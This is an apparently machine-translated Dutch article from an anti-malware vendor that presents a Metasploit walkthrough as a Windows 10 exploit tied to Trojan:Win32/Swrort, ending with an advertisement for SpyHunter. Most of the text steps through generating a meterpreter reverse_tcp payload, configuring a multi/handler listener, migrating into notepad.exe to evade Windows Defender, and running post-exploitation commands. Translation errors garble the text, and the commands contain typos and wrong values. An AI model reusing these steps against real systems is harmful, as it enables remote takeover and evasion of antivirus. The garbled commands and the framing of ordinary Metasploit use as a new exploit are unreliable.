Naam | Trojaans:Win32 / Swrort |
Type | Trojaans |
Korte Omschrijving | Lees en machtigingen te schrijven in Windows 10. Hiermee kan de aanvaller naar andere PC aangesloten op de besmette één infecteren. |
Symptomen | Verschijning van een onbekende .exe-bestand. |
Distributie Methode | Spam-mails. MITM aanvallen, kwaadaardige redirects. |
Detectie-instrument | Download SpyHunter, Om te zien of uw systeem is getroffen door Trojan:Win32 / Swrort |
Een gevaarlijke exploit is ontdekt in Windows 10, met behulp van een Trojaans:Win32 / Swrort Windows Defender te omzeilen en krijgen lees- en schrijfrechten. Anonieme onderzoeker heeft de kwetsbaarheid van een kanaal aangetoond, genoemd Metasploitstation. Hij toont 3 fasen waarin u kunt glippen Windows 10 verdedigingen. Er was geen informatie tot nu toe op de vraag of deze exploit is vastgesteld of ontdekt geen.
Windows 10 Multihandler Exploit Infectie – Hoe je dat doet?
In de video, de tech-savvy gebruiker blijk gegeven van een simulatie van een '123.exe' bestand dat hij creëert en uitvoert alsof het in de echte wereld werd geopend als een bijlage bij een e-mail of uitgevoerd door een andere methode. We hebben besloten om het infectieproces te verdelen in drie fasen om u te helpen beter inzicht in de methodiek.
Fase 1: File Voorbereiding
De hacker maakt een laadvermogen met deze configuratie in een Linux-omgeving:
→msfpaayload windows/meterpreter/reverse_tcp LHOST=
portnumber1 * – Dit is de poort voor de aanval. Het kan elke poort (4444, 4324, etc.). We hebben portnumber1 geschreven, omdat hij gebruik maakt van een tweede poortnummer dat we de naam
Na deze fase is voltooid en het bestand wordt gecreëerd door de aanvaller en vallen op het gebruikerssysteem, de aanvaller kan overgaan tot Fase 2.
Fase 2: Met behulp van de exploit.
Op dit punt, de aanvaller maakt gebruik van multihandler te maken het de .exe te bekijken en te profiteren van de te benutten om een actieve sessie te openen(aansluiten) het slachtoffer PC.
Dit kan gebeuren met behulp van de huidige bevellijnen:
→msfconsole (Om de console te starten. Opent 'Artsen zonder Grenzen>' interface van)
In 'Artsen Zonder Grenzen' kan de aanvaller de volgende opdrachten uit te voeren:
→msf> gebruik te benutten / Multi / handler
set Lhost 'slachtoffer IP-adres’
Stel lport 'portnumber1’
Nadien, de aanvaller voert de lading een sessie tot stand:
→msfexploit(handler)>set payload windows/meterpreter/reverse_tcp
Om te controleren of een actieve sessie is mogelijk, de aanvaller schrijft het commando msfexploit(handler)> Opties weergeven die hem in staat stellen om dit te zien
→EXITFUNC proces ja Exit techniek(aanvaard: seh, draad..)
LHOST slachtoffer IP-adres ja De luister-poort
LPORT portnumber1 ja De luister adres
Dit stelt hem in staat om te zien dat hij de instellingen correct geconfigureerd en kunnen doorgaan met de daadwerkelijke infectie van de computer.
Fase 3: Infectie
Het commando dat de aanvaller gebruikt om een actieve sessie te starten met het slachtoffer is 'exploiteren'. Na het uitvoeren van deze opdracht, het bestand '123.exe' terug met dit antwoord:
→[*] Gestart omgekeerde handler op
[*] Het starten van de payload handler…
Op dit punt, het uitvoerbare bestand is gestart op de Windows-machine. Ondanks het feit dat Windows Defender software draaide, het niet stoppen met de aanval. Maar toen gescand op virussen, het Windows-antivirusprogramma onmiddellijk gedetecteerd '123.exe' als een Trojan:Win32 / Swrort.A.
Om detectie te vermijden, de aanvaller gebruikt een tactiek, riep migrerende waarin een 'notepad.exe' bestand dat de actieve sessie van '123.exe' migreert naar dit bestand na het aansluiten van gemaakt. Dit werd gedaan met behulp van het commando:
→meterpreter>run post/windows/manage/migrate
Na migratie van het proces en het herhalen van dezelfde simulatie, maar met behulp
Vanaf daar, de aanvaller aangetoond volledige lees- en schreef machtigingen die door het creëren van een nieuwe map met een nieuw tekstdocument. Voor zover wij weten, de belangrijkste commando's die gebruikt kunnen worden na de aansluiting zijn:
→> Sysinfo - om het systeem-versie en informatie weer te geven.
> dir :/
> Shell - op de Windows-versie en andere informatie te tonen.
> Getwid - toont Windows ID.
> Ps -aux - toont alle .exe bestanden die in de Windows Task Manager.
> Ifconfig - geeft informatie over interfaces (IP-adressen en andere gegevens). Dit commando geeft de aanvaller de informatie op een andere computer die in dezelfde NIC en VLAN met de besmette PC. Dit kan zeer verwoestende voor thuis of op kantoor netwerken zijn in het geval een dergelijke aanval is goed georganiseerd.
Windows 10 Exploits – Conclusie
Er is geen actuele informatie over het al dan niet deze exploit is opgelost, maar net als met alle andere software, Er kunnen meer ongedekte degenen. Dit is de reden waarom in het geval u gebruik maakt van Windows 10, raden wij u aan te downloaden en te installeren geavanceerde bescherming tegen malware programma. Het zal je actief te beschermen en zich regelmatig bij te werken met de nieuwste bedreigingen. Ook, dergelijk programma heeft actieve schilden die onmiddellijk onbevoegde aansluitingen op te sporen.
Spy Hunter scanner zal alleen de bedreiging op te sporen. Als u wilt dat de bedreiging voor automatisch verwijderd, je nodig hebt om de volledige versie van de anti-malware gereedschap kopen.Ontdek meer over SpyHunter Anti-Malware Tool / Hoe te verwijderen SpyHunter